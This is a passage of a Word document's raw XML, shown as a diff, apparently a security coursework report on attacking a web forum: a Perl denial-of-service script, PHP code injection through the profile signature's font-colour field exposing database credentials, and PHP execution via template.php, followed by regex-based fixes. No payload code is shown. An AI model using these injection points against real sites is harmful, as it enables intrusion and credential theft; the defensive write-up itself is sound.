+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B1241F2" wp14:editId="0678DA27">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>-3692</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5731510" cy="3052445"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:wrapSquare wrapText="bothSides"/>
+            <wp:docPr id="4" name="Picture 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="3052445"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="page">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="page">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Upon executi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ng the script the</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> systems CPU cycles increase</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> substanti</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ally as the</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> script exhausts system</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> resources</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39218700" wp14:editId="5644D6D4">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:posOffset>434975</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>246380</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="4530725" cy="3900805"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
+            <wp:wrapSquare wrapText="bothSides"/>
+            <wp:docPr id="7" name="Picture 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4530725" cy="3900805"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="margin">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="margin">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId10" w:history="1">
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Figure. 5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Task Manager displaying CPU cycles while script is running</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Figure. 6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Apache access log results from executed Perl script</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="708A6FA5" wp14:editId="09E9F2FF">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:posOffset>-70779</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>179136</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5731510" cy="1602105"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:wrapSquare wrapText="bothSides"/>
+            <wp:docPr id="5" name="Picture 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="1602105"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="page">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="page">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="20" w:name="_Toc446495299"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc448693182"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>Execution of PHP code using profile signature</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="21"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Once the</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> ‘Font colour 3’ had been modified the message </w:t>
+      </w:r>
+      <w:r>
+        <w:t>incorporating</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the PHP code </w:t>
+      </w:r>
+      <w:r>
+        <w:t>is</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> executed and posts the results to the forum</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> as seen in in figure 7. After viewing the posted message and appending the URL with ‘highlight=1’ the PHP code within the message is then executed displaying the results illustrated in figure 8.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> The results show the exposure of sensitive data such as the database name, username and password. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:pict>
+          <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+            <v:stroke joinstyle="miter"/>
+            <v:formulas>
+              <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+              <v:f eqn="sum @0 1 0"/>
+              <v:f eqn="sum 0 0 @1"/>
+              <v:f eqn="prod @2 1 2"/>
+              <v:f eqn="prod @3 21600 pixelWidth"/>
+              <v:f eqn="prod @3 21600 pixelHeight"/>
+              <v:f eqn="sum @0 0 1"/>
+              <v:f eqn="prod @6 1 2"/>
+              <v:f eqn="prod @7 21600 pixelWidth"/>
+              <v:f eqn="sum @8 21600 0"/>
+              <v:f eqn="prod @7 21600 pixelHeight"/>
+              <v:f eqn="sum @10 21600 0"/>
+            </v:formulas>
+            <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+            <o:lock v:ext="edit" aspectratio="t"/>
+          </v:shapetype>
+          <v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:-20.35pt;margin-top:30.85pt;width:451.35pt;height:74.15pt;z-index:251668480;mso-position-horizontal-relative:text;mso-position-vertical-relative:text;mso-width-relative:page;mso-height-relative:page">
+            <v:imagedata r:id="rId15" o:title="ss"/>
+            <w10:wrap type="square"/>
+          </v:shape>
+        </w:pict>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figure. 7 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Posted message with PHP code within</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43A9A7BF" wp14:editId="5E951B75">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>-204716</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>359069</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5731510" cy="769620"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:wrapSquare wrapText="bothSides"/>
+            <wp:docPr id="9" name="Picture 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="769620"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figure. 8 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Posted message view after URL amendment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="22" w:name="_Toc448693183"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Execution of arbitrary PHP code by exploiting </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>template.php</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="22"/>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:pict>
+          <v:shape id="_x0000_s1027" type="#_x0000_t75" style="position:absolute;margin-left:0;margin-top:32pt;width:450.25pt;height:125.75pt;z-index:251671552;mso-position-horizontal-relative:text;mso-position-vertical-relative:text;mso-width-relative:page;mso-height-relative:page">
+            <v:imagedata r:id="rId17" o:title="ss3"/>
+            <w10:wrap type="square"/>
+          </v:shape>
+        </w:pict>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Figure.8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">View of forum page after modification to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>header.tpl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>As seen in figure 8 the executed PHP code exited the current process and dumped the results to the page. The exposed results display cookie, port and sensitive information of the system that can be used to further exploit security weaknesses.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="23" w:name="_Toc448693184"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>Hardening exploits</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="23"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="24" w:name="_Toc448693185"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>DOS (Denial of Service) Attack</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="24"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>In the effort to prevent DDOS</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/DOS attacks</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> server</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s are now commonly</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> configured to limit the number</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> of connections to</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> each </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">unique </w:t>
+      </w:r>
+      <w:r>
+        <w:t>IP address.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> This is to prevent mass requests from IP addresses.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="25" w:name="_Toc448693186"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Execution of PHP code using profile signature</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="25"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The removal of special characters can prevent this type of code injection.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">This form of code injection can be prevented by replacing the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>‘</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>Font Colour 3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>‘</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>preg_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>replace</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>'#[^a-f0-9]+#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>','',$theme['fontcolor3']);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>viewTopic.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. This essentially </w:t>
+      </w:r>
+      <w:r>
+        <w:t>performs a regular expression search and replace which effectively removes special characters</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="26" w:name="_Toc448693187"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Execution of arbitrary PHP code by exploiting </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>template.php</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="26"/>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">This exploit can be fixed similarly to the profile signature exploit by a regular expression search and replace of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>‘([0-9a-z_\.-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>]+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>)’</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> opposed to the a general search of ‘</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>(.*)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>’.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="27" w:name="_Toc446495300"/>
+      <w:bookmarkStart w:id="28" w:name="_Toc448693188"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Conclusion</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="27"/>
+      <w:bookmarkEnd w:id="28"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>DDOS and DOS attacks are very resource intensive. As this is the most common form of ha</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ck software</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> systems are been hardened to increase the difficulty of performing such an attack</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> by limiting connections to IP addresses.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> DOS attacks are a brute force effort to bring down the system where as HTML, PHP and SQL injection is more strategically target the system.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Injecting SQL code to the server side language is more</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> of</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a challenge to carry out although it</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is an ideal method for retrieving system data that can provide even more entry points into the system</w:t>
+      </w:r>
+      <w:r>
